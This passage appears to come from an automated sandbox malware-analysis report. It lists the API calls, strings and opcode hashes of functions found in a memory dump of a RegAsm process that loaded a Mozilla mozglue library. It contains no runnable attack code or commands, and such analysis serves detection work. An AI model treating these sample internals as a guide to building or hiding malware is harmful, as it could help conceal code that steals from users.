                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6635BC
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6635E0
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C66363A
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663693
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6636CD
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663703
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C66373C
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663775
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C66378F
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663892
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6638BB
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663902
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663939
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663970
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6639EF
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663A26
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663AE5
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663E85
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663EBA
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663EE2
                                                                                                                                                          • Part of subcall function 6C666180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C6661DD
                                                                                                                                                          • Part of subcall function 6C666180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C66622C
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6640F9
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C66412F
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C664157
                                                                                                                                                          • Part of subcall function 6C666180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C666250
                                                                                                                                                          • Part of subcall function 6C666180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C666292
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C66441B
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C664448
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C66484E
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C664863
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C664878
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C664896
                                                                                                                                                        • free.MOZGLUE ref: 6C66489F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: floor$free$malloc$memcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3842999660-3916222277
                                                                                                                                                        • Opcode ID: 82ca2f26ba789d3a4865035a4c59b5273c3f58658a73f3eaa96036d8be530cf0
                                                                                                                                                        • Instruction ID: d8a16afc170ed66d1b9abdb641eccd9dea7c659fc409f5f0d77e2fcc755317dd
                                                                                                                                                        • Opcode Fuzzy Hash: 82ca2f26ba789d3a4865035a4c59b5273c3f58658a73f3eaa96036d8be530cf0
                                                                                                                                                        • Instruction Fuzzy Hash: 0CF26B74908B808FC325CF29C09469AFBF1FFCA318F118A5ED98997711DB719896CB46
                                                                                                                                                        Function 6C6164C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C6164DF
                                                                                                                                                        • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C6164F2
                                                                                                                                                        • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C616505
                                                                                                                                                        • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C616518
                                                                                                                                                        • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C61652B
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C61671C
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C616724
                                                                                                                                                        • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C61672F
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C616759
                                                                                                                                                        • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C616764
                                                                                                                                                        • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C616A80
                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C616ABE
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C616AD3
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C616AE8
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C616AF7
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                        • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                        • API String ID: 487479824-2878602165
                                                                                                                                                        • Opcode ID: 0332946844619abc9b63a4c2dea35825ae2b8417d825208aa18c559c2585c94d
                                                                                                                                                        • Instruction ID: 00c5d05f3d8ba90055b576cc7de497ccf551f8fc5a7bcc7cdbfc482d3f6875df
                                                                                                                                                        • Opcode Fuzzy Hash: 0332946844619abc9b63a4c2dea35825ae2b8417d825208aa18c559c2585c94d
                                                                                                                                                        • Instruction Fuzzy Hash: DBF1F7749092299FCB20CF29CC887DAB7B4EF46319F1441D8D809A7A41D731EE85CFA9
                                                                                                                                                        Function 6C66C4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C66C5F9
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C66C6FB
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C66C74D
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C66C7DE
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00004014), ref: 6C66C9D5
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C66CC76
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C66CD7A
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C66DB40
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C66DB62
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C66DB99
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C66DD8B
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C66DE95
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C66E360
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C66E432
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C66E472
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$memcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 368790112-0
                                                                                                                                                        • Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                                                                                                        • Instruction ID: fce22423478799b3d9314030f3ce4d70d12cfb984971d9c45271753439a165c5
                                                                                                                                                        • Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                                                                                                        • Instruction Fuzzy Hash: 0833CE71E0021ACFCB04CFA9C8806EDBBF2FF89304F284269D955ABB55D731A945CB95
                                                                                                                                                        Function 6C62ED10 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 5407COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C62EE7A
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C62EFB5
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C631695
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6316B4
                                                                                                                                                        • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C631770
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C631A3E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$freemallocmemcpy
                                                                                                                                                        • String ID: ~q`l$~q`l
                                                                                                                                                        • API String ID: 3693777188-2172191995
                                                                                                                                                        • Opcode ID: 5ec69ad484bef455736075df99c11f9ae6356a6589103ff6c253f2977bc89820
                                                                                                                                                        • Instruction ID: 9145da9a28d44fe5fa2e93d9e2e3e1e391448ef2f1747a65ae1c9d2c75ceeaa3
                                                                                                                                                        • Opcode Fuzzy Hash: 5ec69ad484bef455736075df99c11f9ae6356a6589103ff6c253f2977bc89820
                                                                                                                                                        • Instruction Fuzzy Hash: AEB32871E04229CFCB14CFA8C890ADDB7B2FF49304F2592A9D459AB745D730A986CF94
                                                                                                                                                        Function 6C61FD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68E7B8), ref: 6C61FF81
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68E7B8), ref: 6C62022D
                                                                                                                                                        • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C620240
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68E768), ref: 6C62025B
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68E768), ref: 6C62027B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave$AllocVirtual
                                                                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                        • API String ID: 618468079-3577267516
                                                                                                                                                        • Opcode ID: 69c5a24ff8df53208b5d324a901ff06407065411310e4e806ab4f3440bf936db
                                                                                                                                                        • Instruction ID: e6de1ecec401d8b79f3495975b43c019ef6e234036f3de0a82d11874fc45292b
                                                                                                                                                        • Opcode Fuzzy Hash: 69c5a24ff8df53208b5d324a901ff06407065411310e4e806ab4f3440bf936db
                                                                                                                                                        • Instruction Fuzzy Hash: B7C2E271A097418FD714CF28C490756BBE1BF86328F28C66DE46A8B795C775E801CF89
                                                                                                                                                        Function 6C66E680 Relevance: 31.1, APIs: 22, Instructions: 3648COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,00004014), ref: 6C66E811
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C66EAA8
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C66EBD5
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C66EEF6
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C66F223
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C66F322
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C670E03
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C670E54
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C670EAE
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C670ED4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$memcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 368790112-0
                                                                                                                                                        • Opcode ID: 9b551744a40a3fc8e8f00626e3e589d4888faa1f9052516f53f350c758e20ba8
                                                                                                                                                        • Instruction ID: 8bf93ae55897d58afd8553effa5307e63a69b0748c4ffb87db92f7a10a391c6c
                                                                                                                                                        • Opcode Fuzzy Hash: 9b551744a40a3fc8e8f00626e3e589d4888faa1f9052516f53f350c758e20ba8
                                                                                                                                                        • Instruction Fuzzy Hash: 9663A071E0024ACFCB14CFA8C8906DDF7B2FF89314F298629D855AB745D731A945CBA4
                                                                                                                                                        Function 6C643E50 Relevance: 28.8, APIs: 13, Strings: 3, Instructions: 765COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C667770: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(}>dl,?,?,?,6C643E7D,?,?), ref: 6C66777C
                                                                                                                                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C643F17
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C643F5C
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C643F8D
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C643F99
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C643FA0
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C643FA7
                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C643FB4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ConditionMask$InfoVerifyVersionmemsettolowerwcslen
                                                                                                                                                        • String ID: C>dl$nvd3d9wrap.dll$nvinit.dll
                                                                                                                                                        • API String ID: 1189858803-302148991
                                                                                                                                                        • Opcode ID: 3e7ab2f9ba36ce7c187696c14f15bdfd9e92210826e05ef0403b73b00894a4cb
                                                                                                                                                        • Instruction ID: 7814930fa473b90128f267cfdaa4076f5dd427fb6d4cdf0fbaf30d68dfa86964
                                                                                                                                                        • Opcode Fuzzy Hash: 3e7ab2f9ba36ce7c187696c14f15bdfd9e92210826e05ef0403b73b00894a4cb
                                                                                                                                                        • Instruction Fuzzy Hash: C652D771614B849FDB14DF348480ABBB7E9AF86304F04492DD592CBB91DB74F90ACB68
                                                                                                                                                        Function 6C61FEF0 Relevance: 23.8, APIs: 13, Strings: 2, Instructions: 1294memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68E7B8), ref: 6C61FF81
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68E7B8), ref: 6C62022D
                                                                                                                                                        • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C620240
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68E768), ref: 6C62025B
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68E768), ref: 6C62027B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave$AllocVirtual
                                                                                                                                                        • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                        • API String ID: 618468079-3566792288
                                                                                                                                                        • Opcode ID: c59271a60d767428156fec554c1de4fdc63294978b9f75d60f069840324c4d14
                                                                                                                                                        • Instruction ID: 06dc989eea3778ea493d1010281a0bfd2f92b0a73e3ff323f2bce87d62deb091
                                                                                                                                                        • Opcode Fuzzy Hash: c59271a60d767428156fec554c1de4fdc63294978b9f75d60f069840324c4d14
                                                                                                                                                        • Instruction Fuzzy Hash: 4EB2CD71A097418FD714CF28C490756BBE1BF85328F28C66CE8AA8BB95C779D840CF49
                                                                                                                                                        Function 6C655600 Relevance: 22.0, APIs: 6, Strings: 6, Instructions: 950COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ProfileBuffer parse error: %s$data$expected a Count entry$expected a Time entry$name$schema
                                                                                                                                                        • API String ID: 0-2712937348
                                                                                                                                                        • Opcode ID: 2c50bfc686344b20c684c2407e97219c022df8974bb53bdd11736f530442bc89
                                                                                                                                                        • Instruction ID: b2ce50b035b1a752815f668f06845ca596310f52ef526e7b18fa8242cb4840e4
                                                                                                                                                        • Opcode Fuzzy Hash: 2c50bfc686344b20c684c2407e97219c022df8974bb53bdd11736f530442bc89
                                                                                                                                                        • Instruction Fuzzy Hash: 4E925E71A083418FD724CF28C494B9BB7E1BFC9308F64891DE59A9B751DB30E819CB96
                                                                                                                                                        Function 6C652E4E Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 579stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C652ED3
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C652EE7
                                                                                                                                                        • MozFormatCodeAddressDetails.MOZGLUE(?,000000FF,00000000,?,?), ref: 6C652F0D
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C653214
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C653242
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6536BF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: strlen$AddressCode$DescribeDetailsFormat
                                                                                                                                                        • String ID: MOZ_PROFILER_SYMBOLICATE$get $set
                                                                                                                                                        • API String ID: 2257098003-3318126862
                                                                                                                                                        • Opcode ID: c0e312908621140c1f699f66059f373c9d9ffec939a89a4ba88515ec948c397e
                                                                                                                                                        • Instruction ID: 7cc5ba3ff7ba2cd121e941967b33f637f872be47032bb9dd0f72a7b4831277e1
                                                                                                                                                        • Opcode Fuzzy Hash: c0e312908621140c1f699f66059f373c9d9ffec939a89a4ba88515ec948c397e
                                                                                                                                                        • Instruction Fuzzy Hash: A03283706083818FD724CF24C4806AFB7E2AFC6718FA48D2DE59987751DB31D85ACB5A
                                                                                                                                                        Function 6C647E10 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 403COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpystrlen
                                                                                                                                                        • String ID: (pre-xul)$data$name$schema$vhl
                                                                                                                                                        • API String ID: 3412268980-1044629247
                                                                                                                                                        • Opcode ID: e74219f2ee4405594c0f18f78113e6404d5c1f21f1d9eb397d0d49ed135a855b
                                                                                                                                                        • Instruction ID: 0ca8aa8e78ca14378481be2eb40e33d4038e7a287287f6c8fc4ff7ae13ed822f
                                                                                                                                                        • Opcode Fuzzy Hash: e74219f2ee4405594c0f18f78113e6404d5c1f21f1d9eb397d0d49ed135a855b
                                                                                                                                                        • Instruction Fuzzy Hash: 40E14EB1B043448BC714CF68884066BF7E9BB89314F148D2DE895E7790DB74DD498B99
                                                                                                                                                        Function 6C62D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C63D1C5), ref: 6C62D4F2
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C63D1C5), ref: 6C62D50B
                                                                                                                                                          • Part of subcall function 6C60CFE0: EnterCriticalSection.KERNEL32(6C68E784), ref: 6C60CFF6
                                                                                                                                                          • Part of subcall function 6C60CFE0: LeaveCriticalSection.KERNEL32(6C68E784), ref: 6C60D026
